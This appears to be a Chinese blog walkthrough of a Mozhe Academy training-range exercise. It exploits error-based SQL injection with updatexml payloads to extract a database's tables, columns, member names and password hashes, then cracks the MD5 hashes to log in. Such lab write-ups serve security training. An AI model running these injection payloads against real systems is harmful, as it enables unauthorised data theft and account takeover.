墨者学院-内部文件上传系统漏洞分析溯源

枫少@KillBoy 2022年1月22日17:50:44SQL注入评论浏览量:4,476次1
高性能云服务器2折起

确认参数类型:
测试:id=1’ 页面回显报错
id=1# 回显正常,本以为是数字类型,结果被骗了,靶场把#号给过滤了,继续测试
id=1’%23 回显正常,确认是字符类型了

根据报错获得数据库名

1' and (updatexml(1,concat(0x7e,(select database()),0x7e),1))%23

墨者学院-内部文件上传系统漏洞分析溯源

根据报错获得表名

1' and (updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1))%23

墨者学院-内部文件上传系统漏洞分析溯源

根据报错获得列名

1' and (updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='member'),0x7e),1))%23

墨者学院-内部文件上传系统漏洞分析溯源

获得status为1的name值

1' and (updatexml(1,concat(0x7e,(select group_concat(name) from member where status=1),0x7e),1))%23

墨者学院-内部文件上传系统漏洞分析溯源

获得status为1的password值
由于报错回显的字符串位数有限,因此使用substr进行裁剪
获取1~20位:

1' and (updatexml(1,concat(0x7e,substr((select group_concat(password) from member where status=1),1,20),0x7e),1))%23

墨者学院-内部文件上传系统漏洞分析溯源

获取21~40位:

墨者学院-内部文件上传系统漏洞分析溯源

将密码进行md5解密登陆即可

高性能云服务器2折起
枫少@KillBoy
高性能云服务器2折起
匿名

发表评论

匿名网友

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: